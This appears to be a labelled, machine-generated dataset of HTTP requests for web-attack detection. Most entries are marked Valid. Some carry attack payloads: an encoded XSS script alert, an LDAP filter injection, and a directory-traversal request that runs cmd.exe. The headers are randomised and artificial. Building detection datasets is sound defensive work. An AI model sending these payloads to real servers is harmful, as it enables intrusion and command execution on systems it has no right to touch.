GET /arkTvyM.4IAvXy/tGdzE8ByYKvysD/tE/t6rWSert7tshsuen/mR@I4en2CuQmdqgb/isluot/O5E/jDcdkV4G/pegf7/o2r/a5treI-2te4T.php?ties2smmoexrt=7.MpvJgMSNH&snmoia=necu&neRuo=7326721&irwBtaxihy=511861&slEl8eo1ak=7314&ernjcahUz=7&epAnIena=cs&rlt6nE=qcar&nesjiuei1y=sf.mSL3e-1 HTTP/1.0
Host: www.eftg3.be
Connection: close
Accept: */*;q=0.1
Accept-Charset: isiri-3342;q=0.9, iso-8859-6;q=0.9, windows-1254;q=0.6
Accept-Encoding: gzip, deflate, gzip;q=0.1, identity;q=0.1, compress;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 179.129.106.47
Cookie: Kbh8ZShtaccesMH=sepHaA;fe8ep0uEnEeoy=eeblheoes24nsien;ra=928344048
Cookie2: $Version="19"
Date: Wed, 30 Nov 05 22:59:47 CET
ETag: W/"WaaBRIw7EUb4KWIo"
Expect: 100-continue
From: aeeaqe@ea10ef.st
If-Modified-Since: Fri, 04 Dec 09 23:06:07 CET
If-Unmodified-Since: Wed, 17 Jan 07 10:34:08 UTC
If-Match: "PE@z7i_gfZA5f43"
If-None-Match: *
If-Range: "edsmN10h@NmKoN1bQq"
Max-Forwards: 1875
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic bWVkY0Q6ZW9zZGEz
Authorization: Basic ZWVPc3M6c3RuTWVscg==
Range: -01
Referer: /lqt2En/r8ersehi/p8oom/w9trtasn.rar
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.9 (Machintosh; U; PPC 0.6; wm-1j; rv:7.0.7) Gecko/07458119
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8443x481
Via: HTTP/4.8 136.247.66.114, 5.8 www.awhg.tiff, 5.8 www.fgecc5.png
Transfer-Encoding: identity
Upgrade: eEeZe/7.4, Zmitao/2.6, hfrDo/5.0
Warning: 303 27.61.130.243 "4sxeeeopTs5wI" "Mon, 20 Nov 06 24:32:15 UTC"
X-Forwarded-For: 157.125.101.111
X-Serial-Number: 0043438224132828242
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14019
Start - Id: 48109
class: XSS
GET /bRiJtR_AZ.asmx?toetoe5ottx=mALL4&emoeeol=OehOart3rincludel&Gphpincludec3Uoh4=41&slolnjiryqI=41133&gwyccrst=sn3slocation&p5Qe=6093&ieeE=6&dt9nlTmtuwols=etan+d5lcDs%24&nconnectOdZ=gdaaydrT3b7ewdtIfe&PSDiotAlq=%3Cxml+++++id++%3D++++%22X+++++%22+%3E%3Ca++%3E%3Cb+%3E%26lt%3Bscript++++%3E%5Balert++++%28%2753i2y%27%29%3B%5D%26lt%3B%2Fscript++%3E%3B%3C%2Fb+++%3E%3C%2Fa++++%3E%3C%2Fxml++%3E&j4tnemwlneznp=ode&oaIeoua2hy2r072=2ltdez0&xot6hzelli=aEee1ret&wpamL1y2t=iqFsBRaQ2U&itanLN3j=iUh.fHYW4Y HTTP/1.1
Host: www.t0tl8.fr
Connection: keep-alive
Accept: image/png, audio/*;q=0.5
Accept-Charset: x-mac-ce, us-ascii;q=0.8, iso-2022-kr
Accept-Encoding: compress;q=0.9, deflate
Accept-Language: *;q=0.6
Cache-Control: es9=ttjneg8
Client-ip: 182.252.28.208
Cookie: aelbotc8w=859163962;MmyWsasrh=H6netuo3tswte
Cookie2: $Version="832"
Date: Mon, 14 Apr 08 04:26:03 UTC
ETag: "zhoSb8pInZCHaX_c"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Tue, 12 Aug 08 15:10:18 GMT
If-Unmodified-Since: Wed, 06 May 09 05:49:14 GMT
If-Match: "xPb8iK-qdGXF1uL@"
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 3.4
Pragma: s=itinahE
Proxy-Authorization: Digest realm
Authorization: NTLM SWtjbWdpQlRybm8xdW9lZTFndG51ZGZhT2k2OGN0ZUU1eW5vZQ==
Range: 223086-98
Referer: http://www.hllneRfn.biz/tb6o/Derlf9tw/Dlkwt/teAwaet.php4
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.2 (X11; U; Open BSD i586 2.1; gn-he; rv:5.2.3) Gecko/91120465
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6001x2247
Via: itc/9.4 www.tnaee3a.gif, ihxe/1.2 22.35.3.209:4, 0.4 186.28.142.209
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48109
Start - Id: 13455
class: Valid
GET /rnrnirrsneb2/cQ22QBMUm/mK5YBzI4v-dOSjTjbS/-xp_/objectaPKB/Oieqfroottuanf7a/cl/8s0dax/ikghxtlnhta95senizr/9qA.png?e7ohrNhbhvope=7&fCNRt=snhmnnirw3m2aee&oeyespit=02&aetnleincw4o=53088&ck=8557932961&9kvbscriptn=bdT&lZtQQJS5JQ2=89037&4Uwindow.open1EXK73eDV=%2Fe5j&eqmnn=eitew&irdXnaSbsu=25&TagZzph=835&oatt=q1iiKarprtsqttfdt&pna=03700&roylnen=47&1oYNJxpAacopyR8=NLdrtu HTTP/1.1
Host: www.hsrn.it
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1255;q=0.0, x-mac-ce, windows-1250
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 208.189.220.255
Cookie: SmitjjeOaelea=L3nA0cgeylbp5tteo;n6re3iL9=il;eKdhttpskj=si1f;XOb2mperl92A0n=loo5 ahncxml;rae=887;wt2edsm8SSth=23
Cookie2: $Version="193"
Date: Sat, 10 Jan 09 03:01:54 UTC
ETag: W/"9cClyJiotc2LukdJQ6R"
Expect: eOslriIo=te2nh;fceueoo=Wbed2i
From: rwsar@atw2syurH.be
If-Modified-Since: Thu, 11 Nov 04 20:33:55 UTC
If-Unmodified-Since: Sat, 25 Dec 04 01:49:11 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Jun 09 04:19:33 CET
Max-Forwards: 5321
MIME-Version: 0.5
Pragma: e=qrcB
Proxy-Authorization: NTLM c29lb25mYXNyc25sc29uZUJkb2F4b2FlczBqRWxOck50cHJsaQ==
Authorization: Digest qop=auth
Range: -20257
Referer: http://ELbt.it/Fs4t/drmwp/abtmede/qM3d9tao.exe
TE: trailers,gzip;q=0.5,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 8.3; ta-xi; rv:6.3.6) Gecko/03873424
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 9732x9138
Via: HTTP/1.9 www.nhtheje7.jpeg:82
Transfer-Encoding: gzip
Upgrade: elrm/4.8, 9bnlab/6.6, srE/5.1
Warning: 427 www.rhaeYhd.css "4AaAsesanea8" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 564796261351412431
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13455
Start - Id: 23703
class: Valid
GET /xidshutdownSdeleteTLDlNVz/heatbOejohya7iyyi/JM/kchmSrthni/uab2YPHjWND2rX76vSr/kD_DQX.mspx?obreaoEatneetit=akQboZp_9_w&iega9o7nwnoa=t&naemtmn=iuasg%29lu&nnsljneotts=879988&y9ODEIOeP=gclhne&@@@Ez0wIj=aUDIkQRvfzD&xr=8 HTTP/1.1
Host: www.Urcy.biz
Connection: close
Accept: application/*;q=0.4, application/*;q=0.5, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 103.148.150.147
Cookie: haipi=386341
Cookie2: $Version="7"
Date: Sat, 11 Nov 06 05:31:20 GMT
ETag: W/"VgZhKD9NhHdEZ3Nql8O"
Expect: 100-continue
From: aoma9pu@etChsK.com
If-Modified-Since: Tue, 14 Jul 09 06:37:44 UTC
If-Unmodified-Since: Sat, 29 Dec 07 12:09:08 UTC
If-Match: *
If-None-Match: "uD4Ad_I@dXtfBrDPS8fn"
If-Range: "WblsMBT92vb0ewR"
Max-Forwards: 302
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic Nml0aTZodzp4RG9jYWl0
Authorization: NTLM bGJlQVJ2ZWw4YzlldG9pR2lEZTUwc21udWx0ZW5zaHJv
Range: 970085-59,16356-937515,323-30
Referer: /HziaonrS/pboB.txt
TE: deflate
Trailer: Cache-Control
User-Agent: Mozilla/5.2 (Machintosh; U; Mac OS X 1.4; 3e-is; rv:8.7.1) Gecko/92364350
UA-CPU: MIPS
UA-Disp: 188,809,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3131x3591
Via: HTTP/2.5 www.hTeraaa.js
Transfer-Encoding: identity
Upgrade: eaoo3/2.4
Warning: 856 71.214.87.68 "aesKobNh8beti" 
X-Forwarded-For: 248.81.152.247
X-Serial-Number: 13224
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23703
Start - Id: 16381
class: Valid
GET /tlpiaaotAnnau.mdb? HTTP/1.0
Host: 21.103.170.194
Connection: rhcu2
Accept: */*;q=0.2
Accept-Charset: windows-1252
Accept-Encoding: 
Accept-Language: s82-5fen;q=0.3, Ctealt-s;q=0.0, daeRa-heiaPu, eeohap-e;q=0.8
Cache-Control: s9m=ec
Client-ip: 240.84.81.255
Cookie: HyVeciwkm=7zrtjwcIS1-W
Cookie2: $Version="05"
Date: Thu, 09 Apr 09 15:03:00 UTC
ETag: "UQpj0l.t2C.cLR5g"
Expect: 100-continue
From: ehadrmtl@rqra.fr
If-Modified-Since: Sat, 11 Feb 06 24:04:04 GMT
If-Unmodified-Since: Mon, 12 Jan 09 17:15:17 CET
If-Match: "jlUL2vBqBR.0WNYy"
If-None-Match: *
If-Range: ".FykaHAHcVqAu6t_Sat"
Max-Forwards: 52
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: seuce boec=laep
Authorization: NTLM bm5yYWxzcjRvbnI4ZW9RMUhxdGFhT2h1Y2VudDducmFlcHNtaGk3YWk=
Range: -652120,9-,091-
Referer: /tl6ucam/atsnoe/8ECe3th/hJ3e.tar
TE: gzip
Trailer: Via
User-Agent: Mozilla/1.3 (X11; U; Unix 7.1; oe-oT; rv:9.2.1) Gecko/58396928
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8564x328
Via: 4.6 35.115.243.67, 1.4 www.grhr.js
Transfer-Encoding: deflate
Upgrade: 2qpnf/0.0, mrmr/9.5, uql/4.8, rtnga/2.2, nj9ne/2.7
Warning: 209 www.atoDlsAt.htm "lwrhisc1S" 
X-Forwarded-For: 35.90.162.224
X-Serial-Number: 87401
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16381
Start - Id: 27571
class: Valid
GET /lZpVVot3pyMpHJivb/rNFn34MJvkOs/GglibPx/sio3Atrs4m6.sh?rOsl=%26soi9y%3Doetonn&2eaeui=t&iaSf1revds=xnracaiw&laeafon=uIS64nX&e1eoDi=mnbip&h7=s+eorno8&oCtovudlmie=291655884&JtENOX@=saZcdzTgR7KH&0Rih=70&dtsc=2io&ne9embkmCeasrE=33&o4udn=+h&totOnht=s8rariTnenoanso HTTP/1.1
Host: 204.223.32.60:41580
Connection: close
Accept: image/png;q=0.9, image/jpeg;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.6, deflate;q=0.2, identity;q=0.1, compress
Accept-Language: *;q=0.9
Cache-Control: cpssiepu='njar'
Client-ip: 62.241.68.195
Cookie: inrahssaEtuoxl=eax2hqtWsaeu8tbSg;7lq=lv-v;strsth=7
Cookie2: $Version="6"
Date: Sun, 31 Oct 04 05:12:24 CET
ETag: "O12WevHQsYQozaMod"
Expect: ruoo5sLm=7puwnt;dkyt
From: nmsse@isns5lO.de
If-Modified-Since: Sun, 01 Apr 07 12:30:16 UTC
If-Unmodified-Since: Wed, 01 Feb 06 19:33:25 GMT
If-Match: *
If-None-Match: "WsmLST8DjIRkvgKbf."
If-Range: "KnvudF4rt30Tzv.-cdi"
Max-Forwards: 924
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: NTLM c2V3ZWEyQWhneDhnZnRWdG80dG9tdG5ycnRldHJtY2VpNw==
Authorization: eraoHb 1uC17=diYrrat
Range: -57143
Referer: http://www.eEbj.uk/nelh/aomtf76b.css
TE: deflate;q=0.7,gzip,trailers
Trailer: If-None-Match
User-Agent: ArnzeTpias3r
UA-CPU: 68000
UA-Disp: 883,733,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4534x344
Via: HTTP/7.6 241.129.162.21
Transfer-Encoding: gzip
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 566 232.157.228.150 "dnPuf1sRqcAfw" 
X-Forwarded-For: 164.135.194.215
X-Serial-Number: 76901665181608584434
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27571
Start - Id: 25722
class: Valid
GET /yPyV.Ef6SKDP-Qu/aPwjx/leIiqHvN3Q_1FSLg/Mjzwiwtnrhzkio2fy/u4xrhOl5SV/uvd_V0q.jpeg?5b=die&ntu=501291&urttceslzhEo=+be0rhahomettsa&vWmetamJ=9086&teoo9ntizteEeo=oI1gpqfyp&3iOdr=23597&Oeax=eL6ce&ei0es5o=58609&ttei3r=otudcshtt&oeth4nwx4=abtnf4wstIr HTTP/1.0
Host: 24.160.36.243
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 39.160.15.83
Cookie: ralNto5Rc9irn9m=6647
Cookie2: $Version="766"
Date: Wed, 28 Jan 04 01:47:43 GMT
ETag: W/"djUo6Ljud8-mNba7BSm"
Expect: 100-continue
From: xschuvm@deiWYe.gov
If-Modified-Since: Wed, 22 Mar 06 23:49:55 GMT
If-Unmodified-Since: Thu, 17 Jun 04 24:28:42 GMT
If-Match: "8MV6-AWtk1iz@aGCCQ"
If-None-Match: *
If-Range: "hhZL@wS6zSOIBr21A.7l"
Max-Forwards: 324
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWZ1YXI1Y3FIaW50ZWVwNnRuYW5sb2FhSXJhaWFudHd5OWFlMW1rOVU=
Authorization: Digest uri=http://ekoqa8oa.uk/Tarrsr.ace
Range: -1,27054-,1-75962
Referer: /hdqe/ritonE/7itn/os9h8ee/jo6ys.wmn
TE: trailers,gzip;q=0.4
Trailer: TE
User-Agent: Mozilla/9.0 (compatible; uralgai; Linux i386; nlabn)
UA-CPU: MIPS
UA-Disp: 7894,3200,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5684x8166
Via: HTTP/0.0 196.73.212.200, 3.9 www.aanEah.html:8
Transfer-Encoding: deflate
Upgrade: ojeiet/9.9, woq/6.0, ttYs/5.7, urTi2/9.1
Warning: 312 www.ehadjrru.jpg "lr4omuoE" 
X-Forwarded-For: 4.231.239.216
X-Serial-Number: 3806005449065232991
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25722
Start - Id: 23297
class: Valid
GET /ErsOuiu7ke8/nueaedQooat6htruoui/evh88e-9R30QWQ0HzPD6/mYxGgDAFFJ9t0DNRJH/9afibshhnlmr3xa/vBdxht.swf?wf9EdZCqg=iDL3MjznX77&mJN8=381062&iiherit8nlipe=position8bdivseuxeyc&rrsvre=Ee78&onnn=nZefe&horsecihOd=aCCAxefSS&nIqaieszRpuai=s7YvDaj5k&.76.6t1varH=sfnt0hkseiuh&vbqO=112361 HTTP/1.0
Host: 212.219.95.36
Connection: keep-alive
Accept: video/quicktime, video/*;q=0.9, text/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, identity;q=0.8, deflate;q=0.8
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 109.32.141.176
Cookie: DexecgVitormRG4body=iniee2oms;tie2essr=adelete1;wiRarfonu=fMG;eozohtist=7;5c78p5Kfrm=t0arra&evocsiigri'a;ncheeabLn4Ots=709504
Cookie2: $Version="39"
Date: Tue, 06 Apr 10 17:07:41 UTC
ETag: W/"NUZkkUOZ6GCqV.vSRcdw"
Expect: 100-continue
From: zttea@aht7uetl.it
If-Modified-Since: Sun, 29 Nov 09 23:02:42 CET
If-Unmodified-Since: Sat, 17 Jul 04 15:58:26 UTC
If-Match: *
If-None-Match: "qo3vpu5Xpv.9m9ra"
If-Range: *
Max-Forwards: 9
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM dTBjaEVvb3NzUm92c2Jvc2xvcW05UllvMWxpcG5hVGUwZWVuZHRkb3Ns
Authorization: NTLM bGFvc25SbDhwYXljY252dDVXT2V0bGluM3NzYnNucmhuZW1zZQ==
Range: 4-,60-1,6450-5
Referer: /nciOaadu/oMT31Jo/os2q4/zew6tn/rstiLl.aspx
TE: trailers,gzip;q=0.8
Trailer: Accept
User-Agent: Mozilla/1.2 (X11; U; Open BSD i386 8.4; 1v-rN; rv:7.1.5) Gecko/40361041
UA-CPU: MIPS
UA-Disp: 139,6869,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 626x088
Via: steey/8.4 www.aedtrete.shtml:562, FTP/0.2 www.lquc.jpeg
Transfer-Encoding: gzip
Upgrade: 4nlniz/5.5, f4jei/3.6, mvxdkn/7.2, x7s/4.1, ws6rfn/9.1
Warning: 798 248.66.204.0 "oxn87lNe" 
X-Forwarded-For: 232.26.81.244
X-Serial-Number: 1450242
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23297
Start - Id: 12181
class: Valid
GET /7accept/y1uTOL/X@JakG5vbscript/est5dst8o/ofewQt3unhhu1te/dXoeads5pc3efoasc.swf?jhpo=tnltMLg HTTP/1.1
Host: www.zx2jolo.de
Connection: keep-alive
Accept: image/png
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 73.101.25.255
Cookie: dnl=eIQWo_07XKC;lfsSfh='t;r0et=924287;RTn9ifouOtnLgL=4t
Cookie2: $Version="078"
Date: Mon, 09 Jan 06 22:08:51 UTC
ETag: "j1BxlK@0FbD71nhplTe"
Expect: ureQ7fow
From: 3stL@Estri.de
If-Modified-Since: Fri, 06 Feb 04 06:02:16 GMT
If-Unmodified-Since: Wed, 07 Jan 04 05:35:31 CET
If-Match: *
If-None-Match: "FmT@w-MJ8Go.B--W"
If-Range: Thu, 27 Aug 09 24:56:02 CET
Max-Forwards: 658
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: lert mmeei=fdhn
Authorization: NTLM ZThydzU1ZGV3YWNmeXRva3NDcHNyT251YWRvZWFjdHRoNXJobjBuMHJwTA==
Range: -242768
Referer: /maaiHsS/cnitns/1Eiy8t/hglgpl.js
TE: chunked;q=0.8
Trailer: Date
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 9.0; fo-tt; rv:5.4.0) Gecko/92923142
UA-CPU: 68000
UA-Disp: 3158,9578,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x2699
Via: 4.4 81.179.155.168, 4.6 119.169.80.42
Transfer-Encoding: compress
Upgrade: baheen/8.2, os6u/6.0, sloeee/4.4
Warning: 246 www.ldb8enl.css "oo3toccnr" "Sun, 02 Dec 07 09:48:03 UTC"
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 36511935
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 12181
Start - Id: 26442
class: Valid
GET /F7script4KSNQV2.6/aQGP3IqzzLLzqr9qc2/wTV03Yy4l/m15I@94Opu1A/ee7cxmNUnifta/yF7Ip5N/egar4a/hMNdncd9c2wrntltacos/eJSxJwbGTgiGo5.sh?yea=if&hsaM=trdromi&i6untzasrtbtih=Perttti7sexelw&ncyy=connectB&nUSJDQW7R=wbrilmosnor&gnd8pRn=blcKf869fsps&mCGgoze2rr=42&aldaalr=43&tzerhtU=d-Qu-CP&sntRrtaE=thichbnl9o HTTP/1.0
Host: www.Hweswmloo.biz
Connection: close
Accept: video/*;q=0.1, application/x-tar, text/*
Accept-Charset: big5;q=0.8, x-mac-roman;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 228.137.159.244
Cookie: pnounitby=dEI2Zf;@@UgaQzFDAx=oavntwib
Cookie2: $Version="77"
Date: Sun, 11 May 08 01:06:27 CET
ETag: "sRrDsG7DlE4T1n07xK"
Expect: hrsM
From: rhj7it@hRooetd.be
If-Modified-Since: Sun, 25 Dec 05 05:17:52 UTC
If-Unmodified-Since: Tue, 13 Apr 04 21:14:19 UTC
If-Match: *
If-None-Match: "3qU6NLzmBMrEjsTChc"
If-Range: "Sw3Cx1k1.qqIvqmYLB"
Max-Forwards: 9078
MIME-Version: 7.7
Pragma: ce4Dztze='twdom'
Proxy-Authorization: Digest username="tmff8btS"
Authorization: Basic MGFkbmV0aWM6b2Fkd2g=
Range: 31-37154,2-
Referer: /daaioeds/tnehesa7/nm6chkro/taaxe.zip
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: ityiEeordoDueabsd3
UA-CPU: StrongARM
UA-Disp: 719,2731,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0638x9966
Via: 40ntei/4.4 50.171.44.63, HTTP/1.1 www.gsren.jpeg
Transfer-Encoding: identity
Upgrade: 5tep/5.6, ncb/4.3, eo63/4.2
Warning: 816 www.aegrtfH.jpg "tmrtheosaoahwt" 
X-Forwarded-For: 34.156.94.22
X-Serial-Number: 101021310
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26442
Start - Id: 38287
class: LdapInjection
GET /rEygOY7@nt2zzcMU8eVK/kT57XBS./tDZCwYHiYacMv/lIsomsn/ixxFeVyEdjPwFtple/RTobjrmapnedm/4NjYCMnjHp0XHI/Za/DKfZAU4XvqBP6IA/tgPfHy/riN/N.A8group byIHMU-O.jpg?ANrxoH68=1041&uus=wr9oa%29%28%7C+%28aatrd%3D*%29 HTTP/1.1
Host: 122.43.55.15
Connection: cDssrGhi
Accept: text/*, image/gif;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 166.82.60.199
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="80"
Date: Sat, 26 Nov 05 05:24:14 GMT
ETag: W/"Bq3JVGm2RGFCrlvj"
Expect: 100-continue
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Tue, 10 Feb 04 23:52:01 UTC
If-Unmodified-Since: Wed, 03 Jun 09 17:59:34 CET
If-Match: "ET@jdlgsXoHJHvB"
If-None-Match: "6-q2N90f9zcQjfY"
If-Range: *
Max-Forwards: 383
MIME-Version: 5.0
Pragma: i=ecochrgl
Proxy-Authorization: Digest username="xipatefi"
Authorization: sbs8as toert=tVya
Range: 339-28315
Referer: /e95oT/ougtf/lgqex/Dmonee.php4
TE: deflate,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: hLawl4lgnech
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 5.1 96.74.31.247, 6.3 www.OYhmh.js, 2.2 www.Fwenpd.html
Transfer-Encoding: 9MOLse
Upgrade: segoo/3.8
Warning: 319 133.132.138.49 "aLcsnAauiahn" 
X-Forwarded-For: 20.129.147.18
X-Serial-Number: 055236562928
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38287
Start - Id: 873
class: Valid
GET /leoctbkejbea/Gahafeoeim/bK8scjcCDVA/btn/nall/uLR5pyEe.LvT.9bL/RgtihkoiMlls0is/haccess_logWPLU/giHEE1AeQ/c.3MWj5E96X/sZI7Xre6/iSiAldiast3lef.html?-wO_R2childandz5stdin=7501732428&zno=ee5aq4unte&on=401&vwinlivoloyo2s=roK0&a4_SK0ayyU7Ee=oOrtlYgc&aEeyc1tihwnr=h&tdeUwaecwmn=2trs&ieLc=idfoe%25ut+T1olib%40tc+Op%2B&aO9ccattsHh=ey&mbs=ia8yes&Seyt8rafm=et1s&Rahr=replace+&ahAct9elIe0=iff&nStm=%3Ca4a+ HTTP/1.1
Host: www.feugamfr.fr
Connection: close
Accept: application/*, image/*
Accept-Charset: windows-1258
Accept-Encoding: identity;q=0.5, deflate;q=0.4
Accept-Language: *;q=0.8
Cache-Control: max-age=52
Client-ip: 221.84.191.94
Cookie: etaauerlxCtl3=5;dXLvchavingc5p=521604;ctamrfly=kbI
Cookie2: $Version="3"
Date: Sun, 20 Jul 08 09:45:51 CET
ETag: W/"0UHLnbcZRZDpejE"
Expect: 100-continue
From: eboyso@usT0nl.gov
If-Modified-Since: Wed, 07 Sep 05 05:44:38 UTC
If-Unmodified-Since: Sat, 06 Jan 07 10:42:37 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Dec 08 17:45:01 GMT
Max-Forwards: 27
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM ZWVvbnRhT2VPYXV0ckVuZWlqZW5pZGVhbkl6aW9pZG50Nw==
Range: 95471-
Referer: http://www.ir1eea.st/ZpaTa/9oo6hda.exe
TE: chunked;q=0.1,trailers
Trailer: Authorization
User-Agent: bN1a (ipx@osTbG; 9.K8ex; aQIX2sEZ; ns3rI.g6)
UA-CPU: x86
UA-Disp: 1675,0086,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 130x106
Via: 3.8 www.wille.jpg, HTTP/8.8 176.238.17.99:94, 8.7 78.71.5.139
Transfer-Encoding: gzip
Upgrade: 7hee/2.9
Warning: 365 118.102.144.238 "T2htwaueRex7" 
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 873
Start - Id: 22938
class: Valid
GET /vodt@AXEy9/atK/oznPUODk/iyuoby/srlasoie/e@@0wCdC2ZnEvXZtAr/dpSs9eoG3Ip/Eespqt1phic3y1fmed.mdb? HTTP/1.1
Host: 170.172.222.226
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.3, identity;q=0.9
Accept-Language: *
Cache-Control: max-age=91
Client-ip: 79.7.34.194
Cookie: CnEtestexroehp=2992;izG-libHai=~ne)-;notnmjTht=/7@?la=/bniowhereD Nt;JNC3=350
Cookie2: $Version="8"
Date: Fri, 02 Apr 10 11:25:32 GMT
ETag: W/"7wTF12Qg9gzKIlgkm9"
Expect: c9U4=dtl8rty
From: xsep@sla5a0.de
If-Modified-Since: Mon, 14 Jun 04 11:00:00 GMT
If-Unmodified-Since: Wed, 18 Feb 09 10:32:39 GMT
If-Match: "qgGvtMp6yjT..DtYx8"
If-None-Match: "a1ACJ-Fezj9aemYKV"
If-Range: Sun, 26 Jul 09 14:08:41 GMT
Max-Forwards: 40
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: ieSnx2 uercttms=caa5oarX
Authorization: sh5fa tirnAf=mhRn3M
Range: 3828-,508-92
Referer: http://Owsc.net/lhon.swf
TE: trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/0.6 (X11; U; SunOS sun4u 2.5; tr-me; rv:7.7.0) Gecko/54476200
UA-CPU: 68000
UA-Disp: 813,4500,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: FTP/2.2 87.248.109.112, 9.5 www.awPasr40.htm, 0.4 www.awvtahy.htm:25504
Transfer-Encoding: identity
Upgrade: bri/8.0
Warning: 116 www.qob7.png "kgn8bPjeeFe" 
X-Forwarded-For: 18.154.169.169
X-Serial-Number: 08954851223
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22938
Start - Id: 36624
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: 135.95.13.237
Connection: close
Accept: text/*, image/gif;q=0.7, application/*
Accept-Charset: cp-950;q=0.8
Accept-Encoding: gzip, gzip, gzip, compress;q=0.9
Accept-Language: *
Cache-Control: max-age=43599
Client-ip: 107.48.3.140
Cookie: httpsDan=t
Cookie2: $Version="2"
Date: Sun, 13 Apr 08 11:09:25 GMT
ETag: "zWK@khPcwyjwc74KjL"
Expect: 100-continue
From: W3ut@uHnouuou.it
If-Modified-Since: Tue, 27 Apr 10 16:28:36 GMT
If-Unmodified-Since: Sat, 03 Mar 07 16:07:00 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 11 Nov 09 09:05:03 GMT
Max-Forwards: 1400
MIME-Version: 2.7
Pragma: aastt='ryrw'
